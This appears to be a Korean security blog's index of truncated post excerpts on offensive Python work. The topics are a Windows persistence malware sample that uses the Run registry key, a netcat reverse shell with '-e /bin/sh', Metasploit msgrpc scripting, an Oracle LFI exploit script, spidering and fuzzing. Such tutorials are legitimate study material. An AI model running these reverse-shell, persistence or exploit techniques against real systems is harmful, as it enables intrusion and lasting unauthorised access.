0w0

windows 호스트를 대상으로 예제 악성코드 테스트 -악성코드는 기본적으로 타겟과 공격자가 연결을 지속적으로 유지하도록 하는 것. -windows 호스트를 대상으로 사용하는 지속연결 방식은 “SoftwareMicrosoftWindowsCurrentVersionRun” 레지스트리를 사용하는 방법. 해당 코드는 %temp% 디렉터리에 복사된 뒤 HKEY_LOCAL_MACHINE 레지스트리에 등록되어 windows 호스트가 로그인 될 때 마다 실행되게 하는 코드임. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import sys, base64, os, socket, subprocess from _winreg import..

raw shell 연결 대부분 바인드 쉘보다는 리버스 쉘을 사용하여 타겟이 공격자(혹은 C&C)에 바인딩됨 1 2 3 # Start a netcat listener ~$ nc -lvp 443 listening on [any] 443 ... 로컬 환경에서 리스닝 포트 바인딩 후 쉘 실행 1 2 # Use netcat to toss '/bin/sh' over a network socket ~$ nc 127.0.0.1 443 -e /bin/sh 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 id uid=1000(kali) gid=1000(kali) groups=1000(kali) uname -a Linux kali 3.12..

환경 : 칼리리눅스, 파이썬 2.7 pymsf 모듈로 python과 Metasploit’s msgrpc를 활용 msfrpc 패스워드 설정 msf5 > load msgrpc Pass=toor 1 2 3 4 5 6 7 8 root@root:~# msfconsole msf5 > load msgrpc Pass=toor [*] MSGRPC Service: 127.0.0.1:55552 [*] MSGRPC Username: msf [*] MSGRPC Password: toor [*] Successfully loaded plugin: msgrpc msf5 > msfrpc은 msfconsole로 명령하는 것처럼 수행됨 msgrpg 클래스 생성 -> msgrpc 서버 접속 및 가상 콘솔 생성 -> 명령 수행 call 생성..

os, subprocess 모듈을 사용해서 운영체제 명령어 수행 os 모듈 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 >>> import os >>> os.system('uname -a') Linux cell 3.11.0-20-generic #35~precise1-Ubuntu SMP Fri May 2 21:32:55 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux 0 >>> os.system('id') uid=1000(cell) gid=1000(cell) groups=1000(cell),0(root) 0 >>> os.system('ping -c 1 127.0.0.1') PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data...

파이썬 모듈을 사용해서 whois 명령을 수행 cymruwhois 모듈 : https://pypi.org/project/cymruwhois/1.0/ 1 2 3 4 5 6 7 8 9 10 11 12 13 (base) C:\Workspace\repeat>pip install cymruwhois==1.0 Collecting cymruwhois==1.0 Downloading https://files.pythonhosted.org/packages/c8/f0/9d867c586f3eed476622affd82a9a0c14d63438293fc d58885fa80815571/cymruwhois-1.0.tar.gz Building wheels for collected packages: cymruwhois Building w..

- 타겟에 대한 리소스 스캔닝 - 오라클 제품을 대상으로 LFI (Local File Inclusion) 취약점 익스플로잇 Sling.py 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 ##################################### # sling.py - checks for resources # # Can seach for string in response # ##################################### from bs4 imp..

Spidering ( 스파이더링 : 링크 파싱 및 검색 ) 웹 어플리케이션에 대한 분석을 위해 링크된 경로와 URL구조를 파악 해당 모듈 (optparse, spider)을 사용 spider는 scrapy 모듈에 포함되어 v3에서는 "from scrapy.spiders import Spider" 로 모듈 호출 href 태그 파싱으로도 가능하지만 spider 모듈로 코드 간소화 가능 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 #!/usr/bin/python #from spider import webspider as myspider from scrapy.spiders impo..

요청/응답에 대한 분석 모듈(httplib, Mechanize, Beautiful Soup, and urllib/urllib2) 사용 Making a Web Request ( 웹 요청 생성 ) 요청 전송/응답 확인 Python SimpleHTTPServer Parsing HTML ( HTML 파싱 ) 웹 요청에 대한 응답 페이지 html 코드를 파싱 BeautifulSoup 모듈을 사용해서 HTML 태그를 기반으로 보기 좋게 재정렬 파싱한 html 코드를 태그별로 출력 및 분석 가능 parsed.title - 페이지 title 태그 출력, This is a Title! parsed.body - 페이지 body 태그 출력 parsed.iframe - 페이지 iframe 태그 출력 parsed - 응답받은 ..

Generating Python Executables with PyInstaller ( PyInstaller를 사용한 파이썬 실행 파일 생성 ) 파이썬 스크립트를 PyInstaller 모듈을 사용해서 실행 파일로 만들수 있음 pyinstaller 패키지 설치(pip install pyinstaller) 테스트 코드 생성 및 컴파일 1 2 3 4 5 6 import datetime if __name__ == "__main__" : now = datetime.datetime.now() print(now) 출력 2019-12-23 06:34:00.360133 해당 파일 경로에서 pyinstaller 명령 수행 명령: >pyinstaller --onefile [파일.py] dist 폴더 안에 .exe 파일이 생..

파이썬으로 반복적인 연결과 다양한 값을 입력하는 퍼징 공격이 효율적임 의사코드 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 # most likely will be socket, sys, but if its a web service you might import httplib, urllib, etc. # Set up remote IP/Port variables # Invoke the script: ./script.py RHOST = sys.argv[1] RPORT = sys.argv[2] # Define your buffer string that will be incremented until a potential crash buffer = 'x41'*50 # Cre..